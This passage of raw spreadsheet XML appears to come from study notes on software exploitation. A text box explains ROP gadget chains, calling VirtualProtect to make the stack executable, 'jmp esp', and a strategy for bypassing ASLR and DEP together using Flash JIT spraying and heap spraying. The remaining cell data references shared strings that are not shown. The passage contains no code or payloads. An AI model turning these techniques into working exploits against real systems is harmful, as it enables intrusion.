            <a:defRPr/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>A leaky or dangling pointer is where a reliable location on the stack is known and used to locate a function pointer to execute the exploit. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="0" baseline="0"/>
            <a:t>ROP involves  latching your exploit code onto existing portions of the actual program memory (gadgets). Since the actual program memory is preceived to be legitimate by the DEP, it won't stop their execution. Since gadgets form chained instructions, they can eventually jump to the exploit, and call for memory protection functions like "VirtualProtect" to make the stack executable. We can then "jmp esp" like we did in ASLR.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" marR="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPts val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buClrTx/>
            <a:buSzTx/>
            <a:buFontTx/>
            <a:buNone/>
            <a:tabLst/>
            <a:defRPr/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1" baseline="0"/>
            <a:t>Sample strategy for when ASLR and DEP are concurrently active </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>(Assumes 32-bit</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> OS, and no additional hardware protection, unless specified otherwise)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:effectLst/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1100" b="0" baseline="0"/>
            <a:t>Flash JIT compiles bytecodes into native code. These codes will be stored in memory. Since JIT may need to execute them at some point, DEP will mark them as executable (bypassing DEP). We then need to reproduce our expoit in these bytecodes to masquerade our program as legitimate  flash code. We then make multiple copies of these malicious codes in the memory (heap spraying). As we can now cover large swaths of the memory with our payload, we will increase our probability of execution even if we don't know the exact execution address (reducing the effectiveness of ASLR). </a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>119</xdr:row>
      <xdr:rowOff>9525</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>808892</xdr:colOff>
      <xdr:row>153</xdr:row>
      <xdr:rowOff>84906</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="7" name="Picture 6"/>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22679025"/>
          <a:ext cx="5866667" cy="655238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21"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A166" workbookViewId="0">
      <selection activeCell="A216" sqref="A216"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.42578125" defaultRowHeight="15" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="16.7109375" style="25" customWidth="1"/>
    <col min="2" max="2" width="14.42578125" style="25" customWidth="1"/>
    <col min="3" max="3" width="15.85546875" style="25" customWidth="1"/>
    <col min="4" max="5" width="14.42578125" style="25" customWidth="1"/>
    <col min="6" max="6" width="27.140625" style="25" customWidth="1"/>
    <col min="7" max="7" width="14.42578125" style="25" customWidth="1"/>
    <col min="8" max="16384" width="14.42578125" style="25"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A1" s="19" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="2" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A2" s="1"/>
    </row>
    <row r="3" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A3" s="6" t="s">
        <v>11</v>
      </c>
      <c r="C3" s="11" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="4" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A4" s="2" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="5" spans="1:4" customFormat="1" ht="15" customHeight="1"/>
    <row r="6" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A6" s="5" t="s">
        <v>37</v>
      </c>
      <c r="B6" s="9" t="s">
        <v>18</v>
      </c>
      <c r="C6" s="4" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="7" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A7" s="5" t="s">
        <v>28</v>
      </c>
      <c r="B7" s="10" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="8" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A8" s="5" t="s">
        <v>99</v>
      </c>
      <c r="B8" s="10" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="9" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A9" s="5" t="s">
        <v>30</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="10" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A10" s="5" t="s">
        <v>31</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>12</v>
      </c>
      <c r="D10" s="4"/>
    </row>
    <row r="11" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="B11" s="2"/>
    </row>
    <row r="12" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A12" s="2" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="13" spans="1:4" customFormat="1" ht="15" customHeight="1"/>
    <row r="14" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A14" s="1" t="s">
        <v>0</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A15" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D15" s="3" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="16" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A16" s="2" t="s">
        <v>3</v>
      </c>
      <c r="D16" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="17" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="D17" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="18" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A18" s="2" t="s">
        <v>4</v>
      </c>
      <c r="C18" s="2"/>
      <c r="D18" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="19" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A19" s="2" t="s">
        <v>5</v>
      </c>
      <c r="C19" s="2"/>
    </row>
    <row r="20" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="B20" s="2" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="21" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="B21" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C21" s="2"/>
    </row>
    <row r="22" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="B22" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C22" s="2"/>
    </row>
    <row r="23" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="B23" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D23" s="2"/>
    </row>
    <row r="24" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A24" s="2" t="s">
        <v>10</v>
      </c>
      <c r="D24" s="2"/>
    </row>
    <row r="25" spans="1:4" customFormat="1" ht="15" customHeight="1"/>
    <row r="26" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A26" s="8" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="27" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A27" s="4" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="28" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A28" s="4" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="29" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A29" s="4" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="30" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A30" s="4" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="31" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A31" s="4"/>
    </row>
    <row r="32" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A32" s="8" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="33" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A33" s="4" t="s">
        <v>51</v>
      </c>
      <c r="C33" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="34" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A34" s="7" t="s">
        <v>103</v>
      </c>
      <c r="C34" s="7" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="35" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A35" s="7" t="s">
        <v>105</v>
      </c>
      <c r="C35" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="36" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A36" s="7" t="s">
        <v>104</v>
      </c>
      <c r="C36" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="37" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A37" s="4" t="s">
        <v>52</v>
      </c>
      <c r="C37" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="38" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A38" s="7" t="s">
        <v>53</v>
      </c>
      <c r="C38" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="39" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A39" s="4" t="s">
        <v>54</v>
      </c>
      <c r="C39" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="40" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A40" s="7" t="s">
        <v>55</v>
      </c>
      <c r="C40" s="4" t="s">
        <v>88</v>
      </c>
      <c r="D40" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="41" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A41" s="4" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="42" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A42" s="7" t="s">
        <v>57</v>
      </c>
      <c r="C42" s="4" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="43" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A43" s="7" t="s">
        <v>126</v>
      </c>
      <c r="D43" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="44" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A44" s="7" t="s">
        <v>125</v>
      </c>
      <c r="D44" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="45" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A45" s="7" t="s">
        <v>107</v>
      </c>
      <c r="D45" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="46" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A46" s="7" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="47" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A47" s="7" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="48" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A48" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B48" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="49" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B49" t="s">
        <v>50</v>
      </c>
      <c r="E49" s="2"/>
    </row>
    <row r="50" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B50" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="51" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="F51" s="2"/>
    </row>
    <row r="52" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A52" s="4" t="s">
        <v>61</v>
      </c>
      <c r="D52" s="4" t="s">
        <v>108</v>
      </c>
      <c r="F52" s="2"/>
    </row>
    <row r="53" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A53" s="19" t="s">
        <v>20</v>
      </c>
      <c r="F53" s="2"/>
    </row>
    <row r="54" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A54" s="6" t="s">
        <v>62</v>
      </c>
      <c r="B54" s="2"/>
    </row>
    <row r="55" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="56" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A56" s="8" t="s">
        <v>142</v>
      </c>
      <c r="B56" s="7"/>
      <c r="C56" s="7" t="s">
        <v>16</v>
      </c>
      <c r="E56" s="23" t="s">
        <v>128</v>
      </c>
      <c r="F56" s="24"/>
    </row>
    <row r="57" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A57" s="20" t="s">
        <v>112</v>
      </c>
      <c r="B57" t="s">
        <v>12</v>
      </c>
      <c r="E57" s="22" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="58" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A58" s="21" t="s">
        <v>113</v>
      </c>
      <c r="B58" t="s">
        <v>12</v>
      </c>
      <c r="C58" s="8" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="59" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A59" s="22" t="s">
        <v>148</v>
      </c>
      <c r="B59" s="4" t="s">
        <v>109</v>
      </c>
      <c r="C59" s="20" t="s">
        <v>112</v>
      </c>
      <c r="D59" s="4" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="60" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A60" s="8" t="s">
        <v>143</v>
      </c>
      <c r="C60" s="20" t="s">
        <v>113</v>
      </c>
      <c r="D60" s="4" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="61" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A61" s="21" t="s">
        <v>112</v>
      </c>
      <c r="B61" t="s">
        <v>12</v>
      </c>
      <c r="C61" s="20" t="s">
        <v>110</v>
      </c>
      <c r="D61" s="4" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="62" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A62" s="21" t="s">
        <v>113</v>
      </c>
      <c r="B62" t="s">
        <v>12</v>
      </c>
      <c r="C62" s="20" t="s">
        <v>111</v>
      </c>
      <c r="D62" s="4" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="63" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A63" s="22" t="s">
        <v>147</v>
      </c>
      <c r="B63" s="4" t="s">
        <v>109</v>
      </c>
      <c r="C63" s="20" t="s">
        <v>144</v>
      </c>
    </row>
    <row r="64" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="E64" s="4" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="65" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="C65" s="7" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="66" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A66" s="8" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="67" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A67" s="4" t="s">
        <v>140</v>
      </c>
    </row>
    <row r="68" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A68" s="4" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="69" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A69" s="4" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="70" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A70" s="4" t="s">
        <v>139</v>
      </c>
    </row>
    <row r="71" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A71" s="4" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="72" spans="1:4" customFormat="1" ht="15" customHeight="1"/>
    <row r="73" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A73" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C73" s="14" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="74" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A74" s="2" t="s">
        <v>2</v>
      </c>
      <c r="B74" s="13"/>
      <c r="C74" s="16" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="75" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A75" s="2" t="s">
        <v>3</v>
      </c>
      <c r="B75" s="13"/>
      <c r="C75" s="13"/>
    </row>
    <row r="76" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A76" s="13"/>
      <c r="B76" s="13"/>
      <c r="C76" s="13"/>
    </row>
    <row r="77" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A77" s="13" t="s">
        <v>115</v>
      </c>
      <c r="B77" s="13"/>
      <c r="C77" s="13"/>
      <c r="D77" s="13"/>
    </row>
    <row r="78" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A78" s="13" t="s">
        <v>5</v>
      </c>
      <c r="B78" s="13"/>
      <c r="C78" s="13"/>
      <c r="D78" s="13"/>
    </row>
    <row r="79" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="B79" s="15" t="s">
        <v>116</v>
      </c>
      <c r="C79" s="13"/>
      <c r="D79" s="13"/>
    </row>
    <row r="80" spans="1:4" customFormat="1" ht="15" customHeight="1">
      <c r="A80" s="13" t="s">
        <v>10</v>
      </c>
      <c r="B80" s="13"/>
      <c r="C80" s="13"/>
      <c r="D80" s="13"/>
    </row>
    <row r="81" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="C81" s="13"/>
      <c r="D81" s="13"/>
    </row>
    <row r="82" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A82" s="13" t="s">
        <v>63</v>
      </c>
      <c r="B82" s="13"/>
      <c r="C82" s="13"/>
      <c r="D82" s="13"/>
    </row>
    <row r="83" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A83" s="13" t="s">
        <v>5</v>
      </c>
      <c r="B83" s="13"/>
      <c r="C83" s="13"/>
      <c r="D83" s="13"/>
    </row>
    <row r="84" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B84" s="15" t="s">
        <v>118</v>
      </c>
      <c r="C84" s="13"/>
      <c r="D84" s="13"/>
    </row>
    <row r="85" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B85" s="15" t="s">
        <v>64</v>
      </c>
      <c r="C85" s="13"/>
      <c r="D85" s="13"/>
      <c r="F85" s="13"/>
    </row>
    <row r="86" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B86" s="15" t="s">
        <v>65</v>
      </c>
      <c r="C86" s="13"/>
      <c r="D86" s="13"/>
      <c r="F86" s="13"/>
    </row>
    <row r="87" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B87" s="15" t="s">
        <v>66</v>
      </c>
      <c r="C87" s="13"/>
      <c r="D87" s="13"/>
      <c r="F87" s="13"/>
    </row>
    <row r="88" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B88" s="15" t="s">
        <v>117</v>
      </c>
      <c r="C88" s="13"/>
      <c r="D88" s="13"/>
      <c r="F88" s="13"/>
    </row>
    <row r="89" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B89" s="15" t="s">
        <v>68</v>
      </c>
      <c r="C89" s="13"/>
      <c r="D89" s="13"/>
      <c r="F89" s="13"/>
    </row>
    <row r="90" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B90" s="15" t="s">
        <v>67</v>
      </c>
      <c r="D90" s="13"/>
      <c r="E90" s="17"/>
      <c r="F90" s="13"/>
    </row>
    <row r="91" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="B91" s="15" t="s">
        <v>119</v>
      </c>
      <c r="D91" s="13"/>
      <c r="F91" s="13"/>
    </row>
    <row r="92" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A92" s="13" t="s">
        <v>10</v>
      </c>
      <c r="D92" s="13"/>
      <c r="F92" s="13"/>
    </row>
    <row r="93" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="D93" s="13"/>
      <c r="F93" s="13"/>
    </row>
    <row r="94" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A94" s="8" t="s">
        <v>38</v>
      </c>
      <c r="B94" s="13"/>
      <c r="D94" s="13"/>
      <c r="E94" s="13"/>
      <c r="F94" s="13"/>
    </row>
    <row r="95" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A95" s="4" t="s">
        <v>120</v>
      </c>
      <c r="D95" s="13"/>
      <c r="E95" s="13"/>
      <c r="F95" s="13"/>
    </row>
    <row r="96" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A96" s="4" t="s">
        <v>149</v>
      </c>
      <c r="C96" s="13"/>
      <c r="D96" s="13"/>
      <c r="E96" s="13"/>
      <c r="F96" s="13"/>
    </row>
    <row r="97" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A97" s="4" t="s">
        <v>150</v>
      </c>
      <c r="C97" s="13"/>
      <c r="D97" s="13"/>
      <c r="E97" s="13"/>
      <c r="F97" s="13"/>
    </row>
    <row r="98" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A98" s="4" t="s">
        <v>136</v>
      </c>
      <c r="C98" s="13"/>
      <c r="D98" s="13"/>
      <c r="E98" s="13"/>
      <c r="F98" s="13"/>
    </row>
    <row r="99" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A99" s="4" t="s">
        <v>121</v>
      </c>
      <c r="B99" s="13"/>
      <c r="E99" s="13"/>
      <c r="F99" s="13"/>
    </row>
    <row r="100" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A100" s="4" t="s">
        <v>130</v>
      </c>
      <c r="E100" s="13"/>
      <c r="F100" s="13"/>
    </row>
    <row r="101" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A101" s="4" t="s">
        <v>137</v>
      </c>
      <c r="E101" s="13"/>
      <c r="F101" s="13"/>
    </row>
    <row r="102" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A102" s="4" t="s">
        <v>122</v>
      </c>
      <c r="E102" s="13"/>
      <c r="F102" s="13"/>
    </row>
    <row r="103" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A103" s="4" t="s">
        <v>123</v>
      </c>
      <c r="E103" s="13"/>
      <c r="F103" s="13"/>
    </row>
    <row r="104" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A104" s="4" t="s">
        <v>138</v>
      </c>
      <c r="E104" s="13"/>
      <c r="F104" s="13"/>
    </row>
    <row r="105" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A105" s="19" t="s">
        <v>21</v>
      </c>
      <c r="E105" s="13"/>
      <c r="F105" s="13"/>
    </row>
    <row r="106" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A106" s="7" t="s">
        <v>105</v>
      </c>
      <c r="C106" t="s">
        <v>26</v>
      </c>
      <c r="E106" s="13"/>
      <c r="F106" s="13"/>
    </row>
    <row r="107" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A107" s="7" t="s">
        <v>131</v>
      </c>
      <c r="C107" s="4" t="s">
        <v>27</v>
      </c>
      <c r="E107" s="13"/>
      <c r="F107" s="13"/>
    </row>
    <row r="108" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A108" s="7" t="s">
        <v>73</v>
      </c>
      <c r="C108" s="7" t="s">
        <v>22</v>
      </c>
      <c r="D108" s="4" t="s">
        <v>23</v>
      </c>
      <c r="E108" s="13"/>
      <c r="F108" s="13"/>
    </row>
    <row r="109" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A109" s="4"/>
      <c r="C109" s="4" t="s">
        <v>79</v>
      </c>
      <c r="D109" t="s">
        <v>78</v>
      </c>
      <c r="E109" s="13"/>
      <c r="F109" s="13"/>
    </row>
    <row r="110" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A110" s="7" t="s">
        <v>74</v>
      </c>
      <c r="C110" s="4" t="s">
        <v>82</v>
      </c>
      <c r="D110" s="11" t="s">
        <v>75</v>
      </c>
      <c r="E110" s="13"/>
      <c r="F110" s="13"/>
    </row>
    <row r="111" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A111" s="7" t="s">
        <v>80</v>
      </c>
      <c r="E111" s="13"/>
      <c r="F111" s="13"/>
    </row>
    <row r="112" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A112" s="7" t="s">
        <v>83</v>
      </c>
      <c r="C112" s="7" t="s">
        <v>84</v>
      </c>
      <c r="D112" s="12" t="s">
        <v>86</v>
      </c>
      <c r="E112" s="13"/>
      <c r="F112" s="13"/>
    </row>
    <row r="113" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A113" s="4" t="s">
        <v>85</v>
      </c>
      <c r="F113" s="13"/>
    </row>
    <row r="114" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A114" s="4" t="s">
        <v>76</v>
      </c>
      <c r="C114" s="4" t="s">
        <v>24</v>
      </c>
      <c r="E114" s="11" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="115" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A115" s="4" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="116" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A116" s="4" t="s">
        <v>92</v>
      </c>
      <c r="C116" s="4" t="s">
        <v>77</v>
      </c>
      <c r="D116" s="4"/>
    </row>
    <row r="117" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A117" s="4" t="s">
        <v>133</v>
      </c>
      <c r="F117" s="12" t="s">
        <v>134</v>
      </c>
    </row>
    <row r="118" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A118" s="4" t="s">
        <v>87</v>
      </c>
      <c r="C118" s="4" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="119" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="C119" s="4" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="120" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="C120" s="4"/>
    </row>
    <row r="121" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="122" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="123" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="124" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="125" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="E125" s="4"/>
    </row>
    <row r="126" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="127" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="128" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="C128" s="4"/>
      <c r="D128" s="4"/>
      <c r="E128" s="8"/>
    </row>
    <row r="129" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="D129" s="4"/>
      <c r="E129" s="8"/>
      <c r="F129" s="2"/>
    </row>
    <row r="130" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A130" s="4"/>
      <c r="E130" s="8"/>
      <c r="F130" s="2"/>
    </row>
    <row r="131" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="E131" s="8"/>
    </row>
    <row r="132" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="133" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="A133" s="4"/>
    </row>
    <row r="134" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="135" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="136" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="137" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="138" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="139" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="140" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="141" spans="1:6" customFormat="1" ht="15" customHeight="1"/>
    <row r="142" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="F142" s="8"/>
    </row>
    <row r="143" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="F143" s="8"/>
    </row>
    <row r="144" spans="1:6" customFormat="1" ht="15" customHeight="1">
      <c r="F144" s="8"/>
    </row>
